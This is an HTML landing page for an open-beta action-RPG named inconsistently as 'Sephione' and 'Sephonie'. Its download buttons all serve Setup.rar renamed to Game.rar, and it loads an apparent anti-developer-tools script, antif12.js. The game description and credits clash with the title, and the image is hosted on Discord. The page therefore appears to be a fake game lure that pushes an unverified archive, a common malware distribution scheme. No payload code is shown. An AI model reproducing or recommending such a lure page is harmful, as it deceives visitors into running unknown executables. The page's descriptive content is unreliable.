<!DOCTYPE html>
<html lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="apple-touch-icon" sizes="180x180" href="/assets/images/favicon/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/images/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/images/favicon/favicon-16x16.png">
<link rel="manifest" href="/assets/images/favicon/site.webmanifest">
<link rel="mask-icon" href="/assets/images/favicon/evee.ico" color="#572364">
<meta name="msapplication-TileColor" content="#572364">
<meta content="Sephione - Game" property="og:title">
<meta content="Humans have established their kingdom through centuries of peace efforts while maintaining a safe boundary, away from the dark forces of magic and monstrous beasts that lurk just beyond civilization." property="og:description">
<meta content="#572364" data-react-helmet="true" name="theme-color">
<meta content='https://cdn.discordapp.com/attachments/998771123602853990/1000812208911044609/unknown.png' property='og:image'/>
<meta property="og:image" >
<title>Home - Sephione</title>
<link rel="stylesheet" href="css/rawline.css">
<link rel="stylesheet" href="//fonts.googleapis.com/css2?family=Raleway:wght@300;400;500;600;700;800&display=swap">
<link rel="stylesheet" href="//fonts.googleapis.com/css2?family=Bebas+Neue&family=Montserrat:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap">
<link rel="stylesheet" href="ajax/libs/font-awesome/6.0.0-beta2/css/all.min.css">
<link rel="stylesheet" href="assets/reset.css">
<link rel="stylesheet" href="assets/index.css">
<script charset="utf-8" src="js/antif12.js"></script>
</head>
<body>
<div class="wrapper">
<nav class="navbar">
<div class="navbar__container">
<div class="navbar__branding">
<a href="index.html">
<svg id="logo" width="150" height="150" viewBox="0 0 130 130" xmlns="http://www.w3.org/2000/svg">
<path fill-rule="evenodd" clip-rule="evenodd" d="M72 60H70V19H81V29H90V10H70V0H90H101V10V29H119H130V40V60H119V40H101V49H111V60H101H90H81H72ZM81 49V40H90V49H81ZM60 70H58H49H40H29H19V81H29V90H11V70H0V90V101H11H29V120V130H40H60V120H40V101H49V111H60V70ZM49 90V81H40V90H49ZM70 70H72H81H90H101H111V81H101V90H119V70H130V90V101H119H101V120V130H90H70V120H90V101H81V111H70V70ZM81 90V81H90V90H81ZM60 60H58H49H40H29H19V49H29V40H11V60H0V40V29H11H29V10V0H40H60V10H40V29H49V19H60V60ZM49 40V49H40V40H49Z" fill="#fff" fill-opacity="0.85" />
</svg>
<span>Sephonie</span>
</a>
</div>
<div class="navbar__items navbar__items--mobile">
<a href="#" class="navbar__item">
<label for="input-navbar">
<i class="fas fa-bars"></i>
</label>
</a>
</div>
<input type="checkbox" id="input-navbar" style="display: none;">
<div class="navbar__items">
<a href="Setup.rar" class="navbar__item navbar__item--highlighted" download="Game.rar">Download</a>
</div>
</div>
</nav>
<main class="main">
<div class="main__container">
<section class="section section--hero">
<div class="clouds"></div>
<div class="section__container">
<div class="section__image" style="--image-url: url('images/mennu.png');">
</div>
<div class="section__content">
<h1 class="section__heading">Sephonie</h1>
<p class="section__subheading">The new 2D Action-RPG Multiplayer game...</p>
<div class="section__buttons">
<a href="#section-about" class="button button--secondary">Learn More!</a>
<a href="Setup.rar" class="button button--primary" download="Game.rar">Download Now!</a>
</div>
</div>
</div>
</section>
<div>
<section class="section section--about" id="section-about">
<div class="section__container">
 <div class="section__content">
<h2 class="section__heading">About Sephione</h2>
<p class="section__description">
is a metroidvania/slasher platformer with a charming pixel-art and a captivating story. You’re going to follow the young girl Mako that starts a fascinating adventure to save her world from destruction. Dive into magical worlds of Aarkalia, uncover its secrets and stop the ancient God awakening ritual. It's currently Open-beta and Developed by Nora Team.

    <p> <b>Any Questions?</b> <FONT COLOR="red">contact@sephionegame.com</FONT>  <p>
</p>
</div>
</div>
<section class="section section--feature">
    <div class="section__container">
    <div class="section__image" style="--image-url: url(images/zyro-image_1.png);">
    </div>
    <div class="section__content">
    <h2 class="section__heading">
    </p>
    </div>
    </div>
    </section>
    <section class="section section--feature">
    <div class="section__container">    <p style="font-weight: bold;">Gameplay</p>
    <p>Sephonie has a unique world-switching mechanic. A World Warp ability turns the special in-game areas 180 degrees, transfers the protagonist into another dimension and unlocks new locations.<p>
    <div class="section__image" style="--image-url: url(images/ruins_steam.gif);">
    </div>
    <div class="section__content">
    <h2 class="section__heading"></h2>
    <p class="section__description">
     <a href="https://sephoniegame.com/"></a>
    </div>
    </div>
    </section>
    <section class="section section--feature">
    <div class="section__container">     	    <p style="font-weight: bold;">Combat</p>
    <p>The core element of the Sephonie combat system are various combos. The hero can fight enemies on the ground, toss them up and continue to battle in mid-air. Equipped with a quarterstaff and a hand fan Mako can perform melee and ranged style attacks.<p>
    <div class="section__image" style="--image-url: url(images/metro.gif);">
    </div>
    <div class="section__content">
    <h2 class="section__heading"></h2>
    <p class="section__description">
    </p>
<p style ="color:purple; font-size:24px; font-weight:bold;">SYSTEM REQUIREMENTS
<p style ="color:gray; font-size:19px; font-weight:bold;">MINIMUM:
<p>OS: 7, 8.1, 10 x64
<p>Processor: Intel Core2 Duo E7300 (2 * 2660) or AMD Athlon II X2 270 (2 * 3400) or equivalent
<p>Memory: 4 GB RAM
<p>Graphics: GeForce GT 640 (2048 MB) or Radeon HD 4850 (1024 MB)
<p>Storage: 200 MB available space
<p style ="color:gray; font-size:19px; font-weight:bold;">RECOMMENDED:
<p>OS: 7, 8.1, 10 64 bit
<p>Processor: Intel Pentium G3250 (2*3200) or AMD FX 4350 (4*4200) or equivalent
<p>Memory: 4 GB RAM
<p>Graphics: GeForce GTX 750 (2048 MB) or Radeon RX 560X or GeForce MX 150 or GeForce GTX 970M or Intel UHD 620 or Intel Iris Pro 5200
<p>Storage: 200 MB available space

    </section>
    <section class="section section--download" id="section-download">
    <div class="section__container">
    <div class="section__content">
    <h2 class="section__heading">Download Now</h2>
    <p class="section__description">
    Available for Windows 10 and 11
    </p>
    <div class="section__buttons">
    <a href="Setup.rar" class="button button--primary" download="Game.rar">Download</a>
    </div>
    </div>
    </div>
    </section>
    </div>
    </div>
     </main>
    <footer class="footer" id="footer">
    <div class="footer__container">
    <div class="footer__content">
    <div class="footer__copyright">
    </div>
    <div class="footer__affiliation">
    </div>
    </div>
    <div class="footer__icons">
    <a href="https://sephoniegame.com/" class="footer__icon">
    <i class="fab fa-twitter fa-fw"></i>
    </a>
    <a href="https://sephoniegame.com/" class="footer__icon">
    <i class="fab fa-discord fa-fw"></i>
        <a href="https://sephoniegame.com/" class="footer__icon">
    <i class="fab fa-steam fa-fw"></i>
    </a>
    </a>
    </div>
    </div>
    </footer>
    </div>
</html>
